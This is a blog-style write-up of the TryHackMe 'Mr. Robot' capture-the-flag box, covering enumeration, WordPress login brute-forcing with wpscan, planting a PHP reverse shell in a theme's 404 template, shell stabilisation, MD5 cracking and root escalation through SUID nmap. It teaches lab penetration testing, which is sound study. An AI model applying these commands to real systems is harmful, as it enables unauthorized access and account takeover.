Mr. Robot CTF Write-up: TryHackMe

Hello! This is the first time I’m doing a write-up. I decided to start with a CTF based on one of my favorite shows, hope you enjoy!
This CTF is from TryHackMe, and it is classified as a medium difficulty challenge.

1. Enumeration

Well, let's get started. The first thing we need to do on every CTF is to figure out what ports are open in the target machine. I ran the following command:
$ nmap -sC -sV -T4 $IP -vv -oN common-ports

It’s important to note that without the -p- option nmap will scan only the most common 1000 ports. Running a scan against all 65535 possible ports can take a while, and for this machine in particular we don’t really need to do this.

Since a web server is running, we can perform a directory brute-force and see which ones are valid. To do so, run the following command:
$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -o gobuster-initial

I faced some errors running this command with 30 threads, so I needed to slow down a little bit to 10 threads. Also, the machine’s performance wasn’t going well and the scan was taking too long, so I canceled after about 2,5%.

Via the results of the dir scan, we can see some files related to WordPress. Let’s assume that the server is running WordPress and start to enumerate it. A cool tool made especially for this is wpscan. To view its help page, run wpscan -h.

Unfortunately, wpscan didn’t provide us much interesting information. So, let's start a manual enumeration. Most of the listed options on the main page are just part of the show. Nothing really useful to our objective.
There are some unusual contents in /robots.

User-agent: *
fsocity.dic
key-1-of-3.txt

We found the first key! http://$IP/key-1-of-3.txt
The file fsocity.dic can be used in the future to perform a brute-force attack, let’s take a look at its contents.
$ wc fsocity.dic
858160 858160 7245381 [ That’s a lot of words. ]
Most of the words inside this file are not unique. We can sort the contents and use ‘uniq -u’ to remove all repeated words.
$ sort fsocity.dic | uniq -u > uniq-fsociety.dic

A big difference between the original and the unique. Hey, as we now have a functional password wordlist specific to this challenge, let's work on finding a valid username.

One of the most important things in the pentesting/ethical hacking field is knowing your target. As our target is Mr. Robot themed, we can assume that a valid username can be like mrrobot, robot, fsociety, elliot. Things related to the show.
After some tries on /wp-login.php, a different error message showed up. Elliot seems to be a valid username!

Now, we can use the previously found dictionary to perform a brute force attack against this login page. We can do this with tools like ‘hydra’, but as we are dealing with wordpress, I’ll use wpscan.
$ wpscan --url http://$IP -P uniq-fsociety.dic -U elliot

Nice! Juicy credentials! Now we can log in as elliot.

2. Initial shell

Referencing this super cool article about WordPress shell upload, we can get a reverse shell. If you are using kali, there are some malicious shell code stored in /usr/share/webshells
$ cp /usr/share/webshells/php/php-reverse-shell.php .

Do not forget to edit the IP and PORT fields.
Use your tun0 address. You can see it via $ ifconfig

At the WordPress dashboard, go to Appearance > Themes > Editor
I particularly chose the 404.php, removed all the legit code, and pasted the PHP reverse shell.

Opened a netcat listener and navigated to a random directory in the website to execute the 404 template and boom! Got a shell.

2.1 Netcat shell stabilization

Netcat shells aren’t stable by default. We need to do some manual processes to stabilize it. First thing first, let's see which python version is likely available on the target machine. To do so, we can run $ which python (can be python, python2 or python3)
Command to invoke a python shell:
$ python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
Command to set the TERM variable (clear):
$ export TERM=xterm
Now, put the shell in the background using Ctrl + z and type:
$ stty raw -echo; fg
Press enter two or three times and… welcome, stable shell!

3. Horizontal privilege escalation

We got a shell as the daemon user and our objective is to completely own this machine, so let's work on getting a more privileged account. We can see at the /home directory another user called ‘robot’. Let's get into it.
His password is stored in a world-readable file, and MD5 hashed. Since md5 can be easily cracked, we can crack it locally using tools like hashcat or john, or use websites like crackstation.net (present in the screenshot below).

Alright, we can log in as robot.
$ su robot
Also, the second key is in robot’s home dir and it’s readable by him.

4. Vertical privilege escalation

As we have robot’s password, let's run $ sudo -l and see if there's any command robot can run as root. And… No, unfortunately.
Let's search for binaries with SUID bit set. Run the command:
$ find / -perm -4000 2>/dev/null
Nmap is present and this is not usual. Doing a quick google search, I found this article talking about nmap with suid. Seems like we can run nmap interactively and get a shell as root. Fancy!
$ nmap --interactive
nmap> !sh
# id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
The third key is stored in /root.

5. Conclusion

Although this machine is more CTF-like, with a few situations that could appear in real-life scenarios (wp-login error message), I had a lot of fun doing this box. It’s evident the creator’s effort to make a good machine.
Thank you for your attention!